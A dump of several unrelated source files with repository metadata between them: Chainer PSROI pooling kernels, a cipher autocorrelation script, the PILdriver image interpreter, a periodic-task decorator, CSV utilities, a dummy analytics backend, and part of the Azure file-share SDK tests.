static_cast<float>(ph) * group_size / pooled_height);
int gw = floor(
static_cast<float>(pw) * group_size / pooled_width);
gh = min(max(gh, 0), group_size - 1);
gw = min(max(gw, 0), group_size - 1);
int c = (ctop * group_size + gh) * group_size + gw;
int data_offset = (roi_batch_ind * channels + c) * height * width;
float out_sum = 0;
for (int h = hstart; h < hend; ++h){
for (int w = wstart; w < wend; ++w){
int bottom_index = h * width + w;
out_sum += bottom_data[data_offset + bottom_index];
}
}
float bin_area = (hend - hstart) * (wend - wstart);
top_data = is_empty? (float) 0. : out_sum / bin_area;
''', 'psroi_pooling_2d_fwd'
)(bottom_data, bottom_rois, bottom_roi_indices,
self.spatial_scale, channels, height, width,
self.out_c, self.out_h, self.out_w, self.group_size,
top_data)
return top_data,
def backward_cpu(self, inputs, gy):
_, bottom_rois, bottom_roi_indices = inputs
channels, height, width = self._bottom_data_shape[1:]
n_roi = bottom_rois.shape[0]
bottom_diff = np.zeros(self._bottom_data_shape, np.float32)
for i_roi in six.moves.range(n_roi):
y_min, x_min, y_max, x_max = bottom_rois[i_roi]
batch_index = bottom_roi_indices[i_roi]
y_min = round(y_min * self.spatial_scale)
x_min = round(x_min * self.spatial_scale)
y_max = round(y_max * self.spatial_scale)
x_max = round(x_max * self.spatial_scale)
roi_height = max(y_max - y_min, 0.1)
roi_width = max(x_max - x_min, 0.1)
stride_c = channels / self.out_c
stride_h = roi_height / self.out_h
stride_w = roi_width / self.out_w
group_h = int(round(self.out_h / self.group_size))
group_w = int(round(self.out_w / self.group_size))
for out_h in six.moves.range(self.out_h):
slice_h, len_h = _roi_pooling_slice(
out_h, stride_h, height, int(y_min))
if slice_h.stop <= slice_h.start:
continue
for out_w in six.moves.range(self.out_w):
slice_w, len_w = _roi_pooling_slice(
out_w, stride_w, width, int(x_min))
if slice_w.stop <= slice_w.start:
continue
for out_c in six.moves.range(self.out_c):
diff_val = gy[0][i_roi, out_c, out_h, out_w]
diff_val = diff_val / len_h / len_w
start_c = int(np.floor(out_c * stride_c))
start_c = min(max(start_c, 0), channels)
c = (out_h // group_h) * self.group_size \
+ (out_w // group_w) + start_c
bottom_diff[batch_index, c, slice_h, slice_w] \
+= diff_val
return bottom_diff, None, None
def backward_gpu(self, inputs, gy):
_, bottom_rois, bottom_roi_indices = inputs
channels, height, width = self._bottom_data_shape[1:]
bottom_diff = cuda.cupy.zeros(self._bottom_data_shape, np.float32)
cuda.cupy.ElementwiseKernel(
'''
raw float32 bottom_diff, raw float32 bottom_rois,
raw int32 bottom_roi_indices,
float32 spatial_scale, int32 channels, int32 height, int32 width,
int32 pooled_dim, int32 pooled_height, int32 pooled_width,
int32 group_size
''',
'float32 top_diff',
'''
int ph = (i / pooled_width) % pooled_height;
int pw = i % pooled_width;
int ctop = (i / pooled_width / pooled_height) % pooled_dim;
int n = i / pooled_width / pooled_height / pooled_dim;
// [start, end) interval for spatial sampling
int roi_batch_ind = bottom_roi_indices[n];
float roi_start_h = static_cast<float>(
round(bottom_rois[n * 4 + 0])) * spatial_scale;
float roi_start_w = static_cast<float>(
round(bottom_rois[n * 4 + 1])) * spatial_scale;
float roi_end_h = static_cast<float>(
round(bottom_rois[n * 4 + 2])) * spatial_scale;
float roi_end_w = static_cast<float>(
round(bottom_rois[n * 4 + 3])) * spatial_scale;
// Force too small ROIs to be 1x1
float roi_height = max(roi_end_h - roi_start_h, 0.1);
float roi_width = max(roi_end_w - roi_start_w, 0.1); // avoid 0
// Compute w and h at bottom
float bin_size_h = roi_height / static_cast<float>(pooled_height);
float bin_size_w = roi_width / static_cast<float>(pooled_width);
int hstart = floor(
static_cast<float>(ph) * bin_size_h + roi_start_h);
int wstart = floor(
static_cast<float>(pw) * bin_size_w + roi_start_w);
int hend = ceil(
static_cast<float>(ph + 1.0) * bin_size_h + roi_start_h);
int wend = ceil(
static_cast<float>(pw + 1.0) * bin_size_w + roi_start_w);
// Add roi offsets and clip to input boundaries
hstart = min(max(hstart, 0), height);
wstart = min(max(wstart, 0), width);
hend = min(max(hend, 0), height);
wend = min(max(wend, 0), width);
bool is_empty = (hend <= hstart) || (wend <= wstart);
// Compute c at bottom
int gh = floor(
static_cast<float>(ph) * group_size / pooled_height);
int gw = floor(
static_cast<float>(pw) * group_size / pooled_width);
gh = min(max(gh, 0), group_size - 1);
gw = min(max(gw, 0), group_size - 1);
int c = (ctop * group_size + gh) * group_size + gw;
int bottom_diff_offset = (roi_batch_ind * channels + c);
bottom_diff_offset = bottom_diff_offset * height * width;
float bin_area = (hend - hstart) * (wend - wstart);
float diff_val = is_empty ? (float) 0. : top_diff / bin_area;
for (int h = hstart; h < hend; ++h){
for (int w = wstart; w < wend; ++w){
int bottom_index = h * width + w;
atomicAdd(
&bottom_diff[bottom_diff_offset + bottom_index], diff_val);
}
}
''', 'psroi_pooling_2d_bwd'
)(bottom_diff, bottom_rois, bottom_roi_indices,
self.spatial_scale, channels, height, width,
self.out_c, self.out_h, self.out_w,
self.group_size, gy[0])
return bottom_diff, None, None
def psroi_pooling_2d(
x, rois, roi_indices, out_c, out_h, out_w,
spatial_scale, group_size
):
"""Position Sensitive Region of Interest (ROI) pooling function.
This function computes position sensitive average of input spatial patch
with the given region of interests. Each ROI is splitted into
:math:`(group\_size, group\_size)` regions, and position sensitive values
in each region is computed.
Args:
x (~chainer.Variable): Input variable. The shape is expected to be
4 dimentional: (n: batch, c: channel, h, height, w: width).
rois (array): Input roi. The shape is expected to
be :math:`(R, 4)`, and each datum is set as below:
(y_min, x_min, y_max, x_max). The dtype is :obj:`numpy.float32`.
roi_indices (array): Input roi indices. The shape is expected to
be :math:`(R, )`. The dtype is :obj:`numpy.int32`.
out_c (int): Channels of output image after pooled.
out_h (int): Height of output image after pooled.
out_w (int): Width of output image after pooled.
spatial_scale (float): Scale of the roi is resized.
group_size (int): Position sensitive group size.
Returns:
~chainer.Variable: Output variable.
See the original paper proposing PSROIPooling:
`R-FCN <https://arxiv.org/abs/1605.06409>`_.
"""
return PSROIPooling2D(out_c, out_h, out_w, spatial_scale,
group_size)(x, rois, roi_indices)
| 43.430894 | 79 | 0.556408 |
7bd33472561f0a566151b379605c302860cc8b96
| 454 |
py
|
Python
|
02_streamciphers/autocorrelation.py
|
StoneSwine/IMT4124-cryptology_software
|
f480ad40a02802d82fdf2a3b35bc2251d5241f89
|
[
"Unlicense"
] | null | null | null |
02_streamciphers/autocorrelation.py
|
StoneSwine/IMT4124-cryptology_software
|
f480ad40a02802d82fdf2a3b35bc2251d5241f89
|
[
"Unlicense"
] | null | null | null |
02_streamciphers/autocorrelation.py
|
StoneSwine/IMT4124-cryptology_software
|
f480ad40a02802d82fdf2a3b35bc2251d5241f89
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python3
# CHANGEME:
S = "110010001111010"
T = 15
k = [0, 2, 5, 14]
def leftShift(text, n):
return text[n:] + text[:n]
def diff_letters(a, b):
return sum(a[i] != b[i] for i in range(len(a)))
print(f"Original: {S}")
for i in k:
acn = leftShift(S, i)
D = diff_letters(S, acn) # A-D/T
print(f"Shifted({i})={acn}\t|\tD={D},\tT={T}\tAC({i})={(((T - D) - D) / T):.2f}")
| 19.73913 | 91 | 0.477974 |
cabdab716025c06213b6ed0e3d92d8ba546f189d
| 15,601 |
py
|
Python
|
www/Scripts/pildriver.py
|
jeirych/myblog
|
d9452e50ebfbc94275014e60764ce244f9491733
|
[
"BSD-3-Clause"
] | null | null | null |
www/Scripts/pildriver.py
|
jeirych/myblog
|
d9452e50ebfbc94275014e60764ce244f9491733
|
[
"BSD-3-Clause"
] | null | null | null |
www/Scripts/pildriver.py
|
jeirych/myblog
|
d9452e50ebfbc94275014e60764ce244f9491733
|
[
"BSD-3-Clause"
] | null | null | null |
#!f:\mysite\vmaig_blog\www\scripts\python.exe
"""PILdriver, an image-processing calculator using PIL.
An instance of class PILDriver is essentially a software stack machine
(Polish-notation interpreter) for sequencing PIL image
transformations. The state of the instance is the interpreter stack.
The only method one will normally invoke after initialization is the
`execute' method. This takes an argument list of tokens, pushes them
onto the instance's stack, and then tries to clear the stack by
successive evaluation of PILdriver operators. Any part of the stack
not cleaned off persists and is part of the evaluation context for
the next call of the execute method.
PILDriver doesn't catch any exceptions, on the theory that these
are actually diagnostic information that should be interpreted by
the calling code.
When called as a script, the command-line arguments are passed to
a PILDriver instance. If there are no command-line arguments, the
module runs an interactive interpreter, each line of which is split into
space-separated tokens and passed to the execute method.
In the method descriptions below, a first line beginning with the string
`usage:' means this method can be invoked with the token that follows
it. Following <>-enclosed arguments describe how the method interprets
the entries on the stack. Each argument specification begins with a
type specification: either `int', `float', `string', or `image'.
All operations consume their arguments off the stack (use `dup' to
keep copies around). Use `verbose 1' to see the stack state displayed
before each operation.
Usage examples:
`show crop 0 0 200 300 open test.png' loads test.png, crops out a portion
of its upper-left-hand corner and displays the cropped portion.
`save rotated.png rotate 30 open test.tiff' loads test.tiff, rotates it
30 degrees, and saves the result as rotated.png (in PNG format).
"""
# by Eric S. Raymond <esr@thyrsus.com>
# $Id$
# TO DO:
# 1. Add PILFont capabilities, once that's documented.
# 2. Add PILDraw operations.
# 3. Add support for composing and decomposing multiple-image files.
#
from __future__ import print_function
from PIL import Image
class PILDriver(object):
verbose = 0
def do_verbose(self):
"""usage: verbose <int:num>
Set verbosity flag from top of stack.
"""
self.verbose = int(self.do_pop())
# The evaluation stack (internal only)
stack = [] # Stack of pending operations
def push(self, item):
"Push an argument onto the evaluation stack."
self.stack = [item] + self.stack
def top(self):
"Return the top-of-stack element."
return self.stack[0]
# Stack manipulation (callable)
def do_clear(self):
"""usage: clear
Clear the stack.
"""
self.stack = []
def do_pop(self):
"""usage: pop
Discard the top element on the stack.
"""
top = self.stack[0]
self.stack = self.stack[1:]
return top
def do_dup(self):
"""usage: dup
Duplicate the top-of-stack item.
"""
if hasattr(self, 'format'): # If it's an image, do a real copy
dup = self.stack[0].copy()
else:
dup = self.stack[0]
self.stack = [dup] + self.stack
def do_swap(self):
"""usage: swap
Swap the top-of-stack item with the next one down.
"""
self.stack = [self.stack[1], self.stack[0]] + self.stack[2:]
# Image module functions (callable)
def do_new(self):
"""usage: new <int:xsize> <int:ysize> <int:color>:
Create and push a greyscale image of given size and color.
"""
xsize = int(self.do_pop())
ysize = int(self.do_pop())
color = int(self.do_pop())
self.push(Image.new("L", (xsize, ysize), color))
def do_open(self):
"""usage: open <string:filename>
Open the indicated image, read it, push the image on the stack.
"""
self.push(Image.open(self.do_pop()))
def do_blend(self):
"""usage: blend <image:pic1> <image:pic2> <float:alpha>
Replace two images and an alpha with the blended image.
"""
image1 = self.do_pop()
image2 = self.do_pop()
alpha = float(self.do_pop())
self.push(Image.blend(image1, image2, alpha))
def do_composite(self):
"""usage: composite <image:pic1> <image:pic2> <image:mask>
Replace two images and a mask with their composite.
"""
image1 = self.do_pop()
image2 = self.do_pop()
mask = self.do_pop()
self.push(Image.composite(image1, image2, mask))
def do_merge(self):
"""usage: merge <string:mode> <image:pic1>
[<image:pic2> [<image:pic3> [<image:pic4>]]]
Merge top-of stack images in a way described by the mode.
"""
mode = self.do_pop()
bandlist = []
for band in mode:
bandlist.append(self.do_pop())
self.push(Image.merge(mode, bandlist))
# Image class methods
def do_convert(self):
"""usage: convert <string:mode> <image:pic1>
Convert the top image to the given mode.
"""
mode = self.do_pop()
image = self.do_pop()
self.push(image.convert(mode))
def do_copy(self):
"""usage: copy <image:pic1>
Make and push a true copy of the top image.
"""
self.dup()
def do_crop(self):
"""usage: crop <int:left> <int:upper> <int:right> <int:lower>
<image:pic1>
Crop and push a rectangular region from the current image.
"""
left = int(self.do_pop())
upper = int(self.do_pop())
right = int(self.do_pop())
lower = int(self.do_pop())
image = self.do_pop()
self.push(image.crop((left, upper, right, lower)))
def do_draft(self):
"""usage: draft <string:mode> <int:xsize> <int:ysize>
Configure the loader for a given mode and size.
"""
mode = self.do_pop()
xsize = int(self.do_pop())
ysize = int(self.do_pop())
self.push(self.draft(mode, (xsize, ysize)))
def do_filter(self):
"""usage: filter <string:filtername> <image:pic1>
Process the top image with the given filter.
"""
from PIL import ImageFilter
filter = eval("ImageFilter." + self.do_pop().upper())
image = self.do_pop()
self.push(image.filter(filter))
def do_getbbox(self):
"""usage: getbbox
Push left, upper, right, and lower pixel coordinates of the top image.
"""
bounding_box = self.do_pop().getbbox()
self.push(bounding_box[3])
self.push(bounding_box[2])
self.push(bounding_box[1])
self.push(bounding_box[0])
def do_getextrema(self):
"""usage: extrema
Push minimum and maximum pixel values of the top image.
"""
extrema = self.do_pop().extrema()
self.push(extrema[1])
self.push(extrema[0])
def do_offset(self):
"""usage: offset <int:xoffset> <int:yoffset> <image:pic1>
Offset the pixels in the top image.
"""
xoff = int(self.do_pop())
yoff = int(self.do_pop())
image = self.do_pop()
self.push(image.offset(xoff, yoff))
def do_paste(self):
"""usage: paste <image:figure> <int:xoffset> <int:yoffset>
<image:ground>
Paste figure image into ground with upper left at given offsets.
"""
figure = self.do_pop()
xoff = int(self.do_pop())
yoff = int(self.do_pop())
ground = self.do_pop()
if figure.mode == "RGBA":
ground.paste(figure, (xoff, yoff), figure)
else:
ground.paste(figure, (xoff, yoff))
self.push(ground)
def do_resize(self):
"""usage: resize <int:xsize> <int:ysize> <image:pic1>
Resize the top image.
"""
ysize = int(self.do_pop())
xsize = int(self.do_pop())
image = self.do_pop()
self.push(image.resize((xsize, ysize)))
def do_rotate(self):
"""usage: rotate <int:angle> <image:pic1>
Rotate image through a given angle
"""
angle = int(self.do_pop())
image = self.do_pop()
self.push(image.rotate(angle))
def do_save(self):
"""usage: save <string:filename> <image:pic1>
Save image with default options.
"""
filename = self.do_pop()
image = self.do_pop()
image.save(filename)
def do_save2(self):
"""usage: save2 <string:filename> <string:options> <image:pic1>
Save image with specified options.
"""
filename = self.do_pop()
options = self.do_pop()
image = self.do_pop()
image.save(filename, None, options)
def do_show(self):
"""usage: show <image:pic1>
Display and pop the top image.
"""
self.do_pop().show()
def do_thumbnail(self):
"""usage: thumbnail <int:xsize> <int:ysize> <image:pic1>
Modify the top image in the stack to contain a thumbnail of itself.
"""
ysize = int(self.do_pop())
xsize = int(self.do_pop())
self.top().thumbnail((xsize, ysize))
def do_transpose(self):
"""usage: transpose <string:operator> <image:pic1>
Transpose the top image.
"""
transpose = self.do_pop().upper()
image = self.do_pop()
self.push(image.transpose(transpose))
# Image attributes
def do_format(self):
"""usage: format <image:pic1>
Push the format of the top image onto the stack.
"""
self.push(self.do_pop().format)
def do_mode(self):
"""usage: mode <image:pic1>
Push the mode of the top image onto the stack.
"""
self.push(self.do_pop().mode)
def do_size(self):
"""usage: size <image:pic1>
Push the image size on the stack as (y, x).
"""
size = self.do_pop().size
self.push(size[0])
self.push(size[1])
# ImageChops operations
def do_invert(self):
"""usage: invert <image:pic1>
Invert the top image.
"""
from PIL import ImageChops
self.push(ImageChops.invert(self.do_pop()))
def do_lighter(self):
"""usage: lighter <image:pic1> <image:pic2>
Pop the two top images, push an image of the lighter pixels of both.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.lighter(image1, image2))
def do_darker(self):
"""usage: darker <image:pic1> <image:pic2>
Pop the two top images, push an image of the darker pixels of both.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.darker(image1, image2))
def do_difference(self):
"""usage: difference <image:pic1> <image:pic2>
Pop the two top images, push the difference image
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.difference(image1, image2))
def do_multiply(self):
"""usage: multiply <image:pic1> <image:pic2>
Pop the two top images, push the multiplication image.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.multiply(image1, image2))
def do_screen(self):
"""usage: screen <image:pic1> <image:pic2>
Pop the two top images, superimpose their inverted versions.
"""
from PIL import ImageChops
image2 = self.do_pop()
image1 = self.do_pop()
self.push(ImageChops.screen(image1, image2))
def do_add(self):
"""usage: add <image:pic1> <image:pic2> <int:offset> <float:scale>
Pop the two top images, produce the scaled sum with offset.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
scale = float(self.do_pop())
offset = int(self.do_pop())
self.push(ImageChops.add(image1, image2, scale, offset))
def do_subtract(self):
"""usage: subtract <image:pic1> <image:pic2> <int:offset> <float:scale>
Pop the two top images, produce the scaled difference with offset.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
scale = float(self.do_pop())
offset = int(self.do_pop())
self.push(ImageChops.subtract(image1, image2, scale, offset))
# ImageEnhance classes
def do_color(self):
"""usage: color <image:pic1>
Enhance color in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Color(image)
self.push(enhancer.enhance(factor))
def do_contrast(self):
"""usage: contrast <image:pic1>
Enhance contrast in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Contrast(image)
self.push(enhancer.enhance(factor))
def do_brightness(self):
"""usage: brightness <image:pic1>
Enhance brightness in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Brightness(image)
self.push(enhancer.enhance(factor))
def do_sharpness(self):
"""usage: sharpness <image:pic1>
Enhance sharpness in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Sharpness(image)
self.push(enhancer.enhance(factor))
# The interpreter loop
def execute(self, list):
"Interpret a list of PILDriver commands."
list.reverse()
while len(list) > 0:
self.push(list[0])
list = list[1:]
if self.verbose:
print("Stack: " + repr(self.stack))
top = self.top()
if not isinstance(top, str):
continue
funcname = "do_" + top
if not hasattr(self, funcname):
continue
else:
self.do_pop()
func = getattr(self, funcname)
func()
if __name__ == '__main__':
import sys
# If we see command-line arguments, interpret them as a stack state
# and execute. Otherwise go interactive.
driver = PILDriver()
if len(sys.argv[1:]) > 0:
driver.execute(sys.argv[1:])
else:
print("PILDriver says hello.")
while True:
try:
if sys.version_info[0] >= 3:
line = input('pildriver> ')
else:
line = raw_input('pildriver> ')
except EOFError:
print("\nPILDriver says goodbye.")
break
driver.execute(line.split())
print(driver.stack)
# The following sets edit modes for GNU EMACS
# Local Variables:
# mode:python
# End:
| 29.491493 | 79 | 0.590411 |
da52a8d1d66aee9c4c49d8bb7fd443e5570ea6c6
| 615 |
py
|
Python
|
periodic.py
|
renuka28/media-sorter
|
48a7e31d42e71fa0fcca71114724d0c50969abd0
|
[
"MIT"
] | null | null | null |
periodic.py
|
renuka28/media-sorter
|
48a7e31d42e71fa0fcca71114724d0c50969abd0
|
[
"MIT"
] | null | null | null |
periodic.py
|
renuka28/media-sorter
|
48a7e31d42e71fa0fcca71114724d0c50969abd0
|
[
"MIT"
] | null | null | null |
# Thank you https://gist.github.com/Depado/7925679
import threading
# Function wrapper
def periodic_task(interval, times = -1):
def outer_wrap(function):
def wrap(*args, **kwargs):
stop = threading.Event()
def inner_wrap():
i = 0
while i != times and not stop.isSet():
stop.wait(interval)
function(*args, **kwargs)
i += 1
t = threading.Timer(0, inner_wrap)
t.daemon = True
t.start()
return stop
return wrap
return outer_wrap
| 29.285714 | 54 | 0.505691 |
585ee2bdc6bc5d049dd2fbc3b71536efac25ba30
| 3,369 |
py
|
Python
|
talks/map_filter/umpy_utils.py
|
KTLAI/UMpy
|
6b2af3e936699f5559ef648a36121376bf01a403
|
[
"BSD-3-Clause"
] | null | null | null |
talks/map_filter/umpy_utils.py
|
KTLAI/UMpy
|
6b2af3e936699f5559ef648a36121376bf01a403
|
[
"BSD-3-Clause"
] | null | null | null |
talks/map_filter/umpy_utils.py
|
KTLAI/UMpy
|
6b2af3e936699f5559ef648a36121376bf01a403
|
[
"BSD-3-Clause"
] | 12 |
2020-06-15T13:35:15.000Z
|
2021-09-10T00:38:39.000Z
|
import csv
def read_csv(filepath, delimiter=',', encoding='utf-8'):
"""
Reads a CSV file, parsing row values per the provided delimiter. Returns a list
of lists, wherein each nested list represents a single row from the input file.
Parameters:
filepath (str): The location of the file to read.
delimiter (str): delimiter that separates the row values
encoding (str): character encoding
Returns:
list: contains nested "row" lists
"""
with open(filepath, 'r', newline='', encoding=encoding) as file_obj:
data = []
reader = csv.reader(file_obj, delimiter=delimiter)
for row in reader:
data.append(row)
return data
def read_csv_into_dicts(filepath, delimiter=',', encoding='utf-8'):
"""Accepts a file path, creates a file object, and returns a list of
dictionaries that represent the row values using the cvs.DictReader().
Note: The first row "header" line provides the key names.
Parameters:
filepath (str): path to file
delimiter (str): delimiter that overrides the default delimiter
encoding (str): character encoding
Returns:
list: nested dictionaries representing the file contents
"""
with open(filepath, 'r', newline='', encoding=encoding) as file_obj:
data = []
reader = csv.DictReader(file_obj, delimiter=delimiter)
for line in reader:
data.append(line) # OrderedDict()
# data.append(dict(line)) # convert OrderedDict() to dict
return data
def write_csv(filepath, data, headers=None, encoding='utf-8'):
"""
Writes data to a target CSV file. Column headers are written as the first
row of the CSV file if optional headers are specified.
Parameters:
filepath (str): path to target file (if file does not exist it will be created)
data (list): content to be written to the target file
headers (seq): optional header row list or tuple.
encoding (str): character encoding
Returns:
None
"""
with open(filepath, 'w', newline='', encoding=encoding) as file_obj:
writer = csv.writer(file_obj)
if headers:
writer.writerow(headers) # add header row
for row in data:
writer.writerow(row) # iterable
else:
writer.writerows(data) # iterable
def write_dicts_to_csv(filepath, data, fieldnames, encoding='utf-8'):
"""
Writes dictionary data to a target CSV file as row data using the csv.DictWriter().
The passed in fieldnames list is used by the DictWriter() to determine the order
in which each dictionary's key-value pairs are written to the row.
Parameters:
filepath (str): path to target file (if file does not exist it will be created)
data (list): dictionary content to be written to the target file
fieldnames (seq): sequence specifing order in which key-value pairs are written to each row
encoding (str): character encoding
Returns:
None
"""
with open(filepath, 'w', newline='', encoding=encoding) as file_obj:
writer = csv.DictWriter(file_obj, fieldnames=fieldnames)
writer.writeheader() # first row
writer.writerows(data)
# for row in data:
# writer.writerow(row)
| 33.69 | 99 | 0.650045 |
bdcdff9f5a9cdcc85c1788a6c9d515b0884b470c
| 849 |
py
|
Python
|
analytics/backends/dummy.py
|
educreations/py-analytics
|
abbc814925c6cc200b3329c7de9f1868e1cb8c01
|
[
"Apache-2.0"
] | 10 |
2015-01-25T20:29:55.000Z
|
2020-12-08T21:35:09.000Z
|
analytics/backends/dummy.py
|
educreations/py-analytics
|
abbc814925c6cc200b3329c7de9f1868e1cb8c01
|
[
"Apache-2.0"
] | 3 |
2018-05-15T06:28:20.000Z
|
2021-03-30T17:47:45.000Z
|
analytics/backends/dummy.py
|
educreations/py-analytics
|
abbc814925c6cc200b3329c7de9f1868e1cb8c01
|
[
"Apache-2.0"
] | 6 |
2017-07-03T16:28:29.000Z
|
2020-06-15T19:10:45.000Z
|
from analytics.backends.base import BaseAnalyticsBackend
class Dummy(BaseAnalyticsBackend):
def track_count(self, unique_identifier, metric, inc_amt=1, **kwargs):
pass
def track_metric(self, unique_identifier, metric, date, inc_amt=1, **kwargs):
pass
def get_metric_by_day(self, unique_identifier, metric, from_date, limit=10, **kwargs):
pass
def get_metric_by_week(self, unique_identifier, metric, from_date, limit=10, **kwargs):
pass
def get_metric_by_month(self, unique_identifier, metric, from_date, limit=10, **kwargs):
pass
def get_metrics(self, metric_identifiers, from_date, limit=10, group_by="week", **kwargs):
pass
def get_count(self, unique_identifier, metric, **kwargs):
pass
def get_counts(self, metric_identifiers, **kwargs):
pass
| 32.653846 | 94 | 0.699647 |
ac47fe2fb325be700b323578c96d53f4a3b04649
| 32,608 |
py
|
Python
|
sdk/storage/azure-storage-file-share/tests/test_share.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 1 |
2020-05-12T23:29:15.000Z
|
2020-05-12T23:29:15.000Z
|
sdk/storage/azure-storage-file-share/tests/test_share.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 226 |
2019-07-24T07:57:21.000Z
|
2019-10-15T01:07:24.000Z
|
sdk/storage/azure-storage-file-share/tests/test_share.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 1 |
2020-07-05T21:13:37.000Z
|
2020-07-05T21:13:37.000Z
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import unittest
from datetime import datetime, timedelta
import pytest
import requests
from azure.core.pipeline.transport import RequestsTransport
from azure.core.exceptions import (
HttpResponseError,
ResourceNotFoundError,
ResourceExistsError)
from azure.storage.fileshare import (
AccessPolicy,
ShareSasPermissions,
ShareServiceClient,
ShareDirectoryClient,
ShareFileClient,
ShareClient,
generate_share_sas)
from azure.storage.fileshare._generated.models import DeleteSnapshotsOptionType, ListSharesIncludeType
from devtools_testutils import ResourceGroupPreparer, StorageAccountPreparer
from _shared.testcase import (
StorageTestCase,
LogCaptured,
GlobalStorageAccountPreparer,
GlobalResourceGroupPreparer
)
# ------------------------------------------------------------------------------
TEST_SHARE_PREFIX = 'share'
# ------------------------------------------------------------------------------
class StorageShareTest(StorageTestCase):
def _setup(self, storage_account, storage_account_key):
file_url = self.account_url(storage_account, "file")
credentials = storage_account_key
self.fsc = ShareServiceClient(account_url=file_url, credential=credentials)
self.test_shares = []
def _teardown(self, FILE_PATH):
if os.path.isfile(FILE_PATH):
try:
os.remove(FILE_PATH)
except:
pass
# --Helpers-----------------------------------------------------------------
def _get_share_reference(self, prefix=TEST_SHARE_PREFIX):
share_name = self.get_resource_name(prefix)
share = self.fsc.get_share_client(share_name)
self.test_shares.append(share_name)
return share
def _create_share(self, prefix=TEST_SHARE_PREFIX):
share_client = self._get_share_reference(prefix)
share = share_client.create_share()
return share_client
def _delete_shares(self, prefix=TEST_SHARE_PREFIX):
for l in self.fsc.list_shares(include_snapshots=True):
try:
self.fsc.delete_share(l.name, delete_snapshots=True)
except:
pass
# --Test cases for shares -----------------------------------------
@GlobalStorageAccountPreparer()
def test_create_share(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
# Act
created = self._create_share()
# Assert
self.assertTrue(created)
self._delete_shares(share.share_name)
@GlobalStorageAccountPreparer()
def test_create_share_snapshot(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
# Act
created = share.create_share()
snapshot = share.create_snapshot()
# Assert
self.assertTrue(created)
self.assertIsNotNone(snapshot['snapshot'])
self.assertIsNotNone(snapshot['etag'])
self.assertIsNotNone(snapshot['last_modified'])
self._delete_shares(share.share_name)
@GlobalStorageAccountPreparer()
def test_create_snapshot_with_metadata(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
metadata = {"test1": "foo", "test2": "bar"}
metadata2 = {"test100": "foo100", "test200": "bar200"}
# Act
created = share.create_share(metadata=metadata)
snapshot = share.create_snapshot(metadata=metadata2)
share_props = share.get_share_properties()
snapshot_client = ShareClient(
self.account_url(storage_account, "file"),
share_name=share.share_name,
snapshot=snapshot,
credential=storage_account_key
)
snapshot_props = snapshot_client.get_share_properties()
# Assert
self.assertTrue(created)
self.assertIsNotNone(snapshot['snapshot'])
self.assertIsNotNone(snapshot['etag'])
self.assertIsNotNone(snapshot['last_modified'])
self.assertEqual(share_props.metadata, metadata)
self.assertEqual(snapshot_props.metadata, metadata2)
self._delete_shares(share.share_name)
@GlobalStorageAccountPreparer()
def test_delete_share_with_snapshots(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
snapshot = share.create_snapshot()
# Act
with self.assertRaises(HttpResponseError):
share.delete_share()
deleted = share.delete_share(delete_snapshots=True)
self.assertIsNone(deleted)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_delete_snapshot(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
share.create_share()
snapshot = share.create_snapshot()
# Act
with self.assertRaises(HttpResponseError):
share.delete_share()
snapshot_client = ShareClient(
self.account_url(storage_account, "file"),
share_name=share.share_name,
snapshot=snapshot,
credential=storage_account_key
)
deleted = snapshot_client.delete_share()
self.assertIsNone(deleted)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_create_share_fail_on_exist(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
# Act
created = share.create_share()
# Assert
self.assertTrue(created)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_create_share_with_already_existing_share_fail_on_exist(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
share = self._get_share_reference()
# Act
created = share.create_share()
with self.assertRaises(HttpResponseError):
share.create_share()
# Assert
self.assertTrue(created)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_create_share_with_metadata(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
metadata = {'hello': 'world', 'number': '42'}
# Act
client = self._get_share_reference()
created = client.create_share(metadata=metadata)
# Assert
self.assertTrue(created)
md = client.get_share_properties().metadata
self.assertDictEqual(md, metadata)
self._delete_shares()
@GlobalStorageAccountPreparer()
def test_create_share_with_quota(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
# Act
client = self._get_share_reference()
created = client.create_share(quota=1)
# Assert
props = client.get_share_properties()
self.assertTrue(created)
